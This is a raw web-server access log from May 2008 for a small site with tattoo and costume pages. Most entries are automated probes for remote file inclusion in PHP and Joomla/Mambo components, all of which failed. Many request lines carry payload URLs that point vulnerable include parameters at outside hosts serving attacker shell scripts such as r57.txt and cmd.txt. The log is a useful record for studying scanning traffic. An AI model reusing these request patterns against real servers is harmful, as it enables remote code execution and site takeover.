74.200.201.194 - - [29/May/2008:08:49:56 -0500] "GET /logs/access_log.1207180800//tools/send_reminders.php?noSet=0&includedir=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
74.200.201.194 - - [29/May/2008:08:49:56 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
74.200.201.194 - - [29/May/2008:08:49:57 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
200.30.73.117 - - [29/May/2008:09:01:16 -0500] "GET //gallery/displayCategory.php?basepath=http://www.geocities.com/koeluna/response.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
89.149.226.176 - - [29/May/2008:09:07:10 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
89.149.226.176 - - [29/May/2008:09:07:10 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
78.110.50.114 - - [29/May/2008:09:14:16 -0500] "GET /logs/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
78.110.50.114 - - [29/May/2008:09:14:17 -0500] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
66.90.73.127 - - [29/May/2008:09:15:46 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://amsny.org/site/test1.txt? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
66.90.73.127 - - [29/May/2008:09:15:46 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://amsny.org/site/test1.txt? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
65.55.208.132 - - [29/May/2008:09:16:03 -0500] "GET /logs/access_log.1202083200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
62.65.159.210 - - [29/May/2008:09:16:50 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://rjoos.ch/Reise/images/tOtti/4-.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.76"
62.65.159.210 - - [29/May/2008:09:16:59 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://rjoos.ch/Reise/images/tOtti/4-.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
74.6.19.43 - - [29/May/2008:09:24:56 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.98.220 - - [29/May/2008:09:24:56 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
84.19.176.172 - - [29/May/2008:09:26:21 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
84.19.176.172 - - [29/May/2008:09:26:21 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
65.55.212.47 - - [29/May/2008:09:27:39 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.47 - - [29/May/2008:09:27:39 -0500] "GET /artwork/miscellaneous.htm HTTP/1.0" 404 297 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
74.200.201.194 - - [29/May/2008:09:41:08 -0500] "GET /logs/access_log.1204761600/appserv/main.php?appserv_root=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
74.200.201.194 - - [29/May/2008:09:41:08 -0500] "GET /appserv/main.php?appserv_root=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
74.200.201.194 - - [29/May/2008:09:41:08 -0500] "GET /logs/appserv/main.php?appserv_root=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
74.200.201.194 - - [29/May/2008:09:41:23 -0500] "GET /logs/access_log.1207785600/appserv/main.php?appserv_root=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
195.54.9.218 - - [29/May/2008:09:41:29 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://singspiration.org/cmd.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
195.54.9.218 - - [29/May/2008:09:41:30 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://singspiration.org/cmd.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
195.54.9.218 - - [29/May/2008:09:41:31 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://singspiration.org/idnews.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
195.54.9.218 - - [29/May/2008:09:41:32 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://singspiration.org/idnews.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
195.54.9.218 - - [29/May/2008:09:42:08 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://singspiration.org/cmd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
195.54.9.218 - - [29/May/2008:09:42:08 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://singspiration.org/cmd.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
65.55.212.47 - - [29/May/2008:09:45:37 -0500] "GET /artwork/tombio.htm HTTP/1.0" 404 290 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
87.106.16.18 - - [29/May/2008:09:46:05 -0500] "GET /logs/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
87.106.16.18 - - [29/May/2008:09:46:05 -0500] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
62.76.116.20 - - [29/May/2008:09:48:59 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
62.76.116.20 - - [29/May/2008:09:48:59 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
69.59.25.3 - - [29/May/2008:09:49:16 -0500] "GET /logs/access_log.1204761600//includes/functions_install.php?vwar_root=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
69.59.25.3 - - [29/May/2008:09:49:16 -0500] "GET //includes/functions_install.php?vwar_root=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
69.59.25.3 - - [29/May/2008:09:49:16 -0500] "GET /logs//includes/functions_install.php?vwar_root=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
193.171.89.137 - - [29/May/2008:09:54:07 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
193.171.89.137 - - [29/May/2008:09:54:08 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
193.171.89.137 - - [29/May/2008:09:54:08 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
193.171.89.137 - - [29/May/2008:09:54:09 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
193.171.89.137 - - [29/May/2008:09:54:13 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
84.19.176.172 - - [29/May/2008:09:56:59 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
84.19.176.172 - - [29/May/2008:09:57:00 -0500] "GET //skin/zero_vote/error.php?dir=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
195.74.37.170 - - [29/May/2008:10:17:29 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
195.74.37.170 - - [29/May/2008:10:17:29 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.808"
195.74.37.170 - - [29/May/2008:10:17:29 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
69.64.81.28 - - [29/May/2008:10:18:03 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
195.74.37.170 - - [29/May/2008:10:19:06 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
195.74.37.170 - - [29/May/2008:10:19:06 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
85.214.33.45 - - [29/May/2008:10:26:05 -0500] "GET /logs/errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.69"
85.214.33.45 - - [29/May/2008:10:26:05 -0500] "GET /logs/errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.69"
85.214.33.45 - - [29/May/2008:10:26:06 -0500] "GET /errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.69"
85.214.33.45 - - [29/May/2008:10:26:06 -0500] "GET /errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.69"
203.130.242.48 - - [29/May/2008:10:26:29 -0500] "GET /logs/errors.php?error=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
203.130.242.48 - - [29/May/2008:10:26:30 -0500] "GET /errors.php?error=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
84.19.176.172 - - [29/May/2008:10:29:01 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
84.19.176.172 - - [29/May/2008:10:29:02 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
209.240.231.154 - - [29/May/2008:10:30:08 -0500] "GET /logs/access_log.1207180800//cart_content.php?cart_isp_root=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
209.240.231.154 - - [29/May/2008:10:30:08 -0500] "GET //cart_content.php?cart_isp_root=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
209.240.231.154 - - [29/May/2008:10:30:08 -0500] "GET /logs//cart_content.php?cart_isp_root=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
209.66.200.83 - - [29/May/2008:10:31:01 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
77.221.130.6 - - [29/May/2008:10:33:13 -0500] "GET /logs/errors.php?error=http://www.catim.com/leg/on? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
77.221.130.6 - - [29/May/2008:10:33:13 -0500] "GET /errors.php?error=http://www.catim.com/leg/on? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
213.148.252.24 - - [29/May/2008:10:40:01 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.vass0ra.110mb.com/r57.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
213.148.252.24 - - [29/May/2008:10:40:02 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.vass0ra.110mb.com/r57.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
62.2.100.138 - - [29/May/2008:10:41:32 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.2.100.138 - - [29/May/2008:10:41:33 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
213.148.252.24 - - [29/May/2008:10:42:02 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.vass0ra.110mb.com/r57.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.79"
213.148.252.24 - - [29/May/2008:10:42:03 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.vass0ra.110mb.com/r57.txt?? HTTP/1.1" 404 364 "-""libwww-perl/5.79"
74.208.13.87 - - [29/May/2008:10:42:46 -0500] "GET /logs/errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
74.208.13.87 - - [29/May/2008:10:42:47 -0500] "GET /errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
65.55.208.134 - - [29/May/2008:10:43:40 -0500] "GET /logs/access_log.1208304000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.70.213 - - [29/May/2008:10:45:28 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.213 - - [29/May/2008:10:45:28 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.2.100.138 - - [29/May/2008:10:45:36 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 369 "-""libwww-perl/5.803"
62.2.100.138 - - [29/May/2008:10:45:37 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 364 "-""libwww-perl/5.803"
62.2.100.138 - - [29/May/2008:10:46:41 -0500] "GET /logs/modules%5Cclass%5Ctournament%5CTreeSingle.php/sys_conf[path]=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 412 "-""libwww-perl/5.803"
62.2.100.138 - - [29/May/2008:10:46:42 -0500] "GET /modules%5Cclass%5Ctournament%5CTreeSingle.php/sys_conf[path]=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 407 "-""libwww-perl/5.803"
84.19.176.172 - - [29/May/2008:10:49:48 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
84.19.176.172 - - [29/May/2008:10:49:48 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
84.19.176.172 - - [29/May/2008:10:53:04 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
84.19.176.172 - - [29/May/2008:10:53:05 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
65.55.208.135 - - [29/May/2008:10:53:14 -0500] "GET /logs/access_log.1198281600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
84.19.176.172 - - [29/May/2008:10:56:37 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.65"
84.19.176.172 - - [29/May/2008:10:56:37 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.65"
64.72.119.227 - - [29/May/2008:10:56:47 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://imanicm.com/webcalendar/includes/readme? HTTP/1.1" 404 305 "-""libwww-perl/5.811"
64.72.119.227 - - [29/May/2008:10:56:50 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://imanicm.com/webcalendar/includes/readme? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
194.158.195.132 - - [29/May/2008:10:57:09 -0500] "GET /logs/errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
194.158.195.132 - - [29/May/2008:10:57:10 -0500] "GET /errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.169.183.131 - - [29/May/2008:10:58:07 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
81.169.183.131 - - [29/May/2008:10:58:07 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
65.55.208.124 - - [29/May/2008:10:59:37 -0500] "GET /logs/access_log.1199232000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [29/May/2008:10:59:37 -0500] "GET /logs/access_log.1178409600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.19.160.58 - - [29/May/2008:10:59:57 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.802"
67.19.160.58 - - [29/May/2008:10:59:57 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.802"
198.173.255.213 - - [29/May/2008:11:00:23 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.65"
198.173.255.213 - - [29/May/2008:11:00:23 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
69.89.22.130 - - [29/May/2008:11:01:12 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.812"
69.89.22.130 - - [29/May/2008:11:01:12 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.812"
194.63.235.131 - - [29/May/2008:11:02:26 -0500] "GET /costume/ HTTP/1.0" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
194.63.235.131 - - [29/May/2008:11:02:30 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
194.63.235.131 - - [29/May/2008:11:02:32 -0500] "GET /costume/enter1.gif HTTP/1.0" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
194.63.235.131 - - [29/May/2008:11:02:33 -0500] "GET /costume/costm_a.JPG HTTP/1.0" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
194.63.235.131 - - [29/May/2008:11:02:39 -0500] "GET /costume/history5.gif HTTP/1.0" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
194.63.235.131 - - [29/May/2008:11:02:49 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
194.63.235.131 - - [29/May/2008:11:03:04 -0500] "GET /costume/index1.htm HTTP/1.0" 200 21563 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
194.63.235.131 - - [29/May/2008:11:03:34 -0500] "GET /costume/thmb3.htm HTTP/1.0" 200 2922 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
194.63.235.131 - - [29/May/2008:11:03:35 -0500] "GET /costume/costm25.jpg HTTP/1.0" 200 9810 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
194.63.235.131 - - [29/May/2008:11:03:35 -0500] "GET /costume/costm26.jpg HTTP/1.0" 200 9402 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
194.63.235.131 - - [29/May/2008:11:03:36 -0500] "GET /costume/costm27.jpg HTTP/1.0" 200 9516 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
194.63.235.131 - - [29/May/2008:11:03:37 -0500] "GET /costume/costm28.jpg HTTP/1.0" 200 10658 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
194.63.235.131 - - [29/May/2008:11:03:39 -0500] "GET /costume/costm29.jpg HTTP/1.0" 200 9835 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
194.63.235.131 - - [29/May/2008:11:03:40 -0500] "GET /costume/costm30.jpg HTTP/1.0" 200 59433 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
194.63.235.131 - - [29/May/2008:11:03:41 -0500] "GET /costume/costm31.jpg HTTP/1.0" 200 9395 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
194.63.235.131 - - [29/May/2008:11:03:45 -0500] "GET /costume/costm32.jpg HTTP/1.0" 200 9839 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
205.134.240.162 - - [29/May/2008:11:04:11 -0500] "GET /logs//sitemap.xml//modules/Neos_Chronos/header.php?base_folder=? HTTP/1.1" 404 334 "-""libwww-perl/5.812"
205.134.240.162 - - [29/May/2008:11:04:12 -0500] "GET //sitemap.xml//modules/Neos_Chronos/header.php?base_folder=? HTTP/1.1" 404 329 "-""libwww-perl/5.812"
65.55.208.131 - - [29/May/2008:11:06:21 -0500] "GET /logs/access_log.1199577600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
80.231.171.70 - - [29/May/2008:11:10:11 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
151.11.24.250 - - [29/May/2008:11:10:21 -0500] "GET /logs//sitemap.xml//modules/Neos_Chronos/header.php?base_folder=http://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 404 334 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
151.11.24.250 - - [29/May/2008:11:10:21 -0500] "GET //sitemap.xml//modules/Neos_Chronos/header.php?base_folder=http://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 404 329 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
206.246.17.60 - - [29/May/2008:11:10:25 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
206.246.17.60 - - [29/May/2008:11:10:25 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
85.114.133.81 - - [29/May/2008:11:12:51 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
85.114.133.81 - - [29/May/2008:11:12:51 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
74.208.13.87 - - [29/May/2008:11:18:10 -0500] "GET /logs/ndex.php?_REQUEST=&_REQUEST%5boption%5d=com_peoplebook&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
74.208.13.87 - - [29/May/2008:11:18:10 -0500] "GET /ndex.php?_REQUEST=&_REQUEST%5boption%5d=com_peoplebook&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
195.12.53.176 - - [29/May/2008:11:20:09 -0500] "GET /send_reminders.php?includedir=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 302 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
195.12.53.176 - - [29/May/2008:11:20:21 -0500] "GET /send_reminders.php?includedir=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
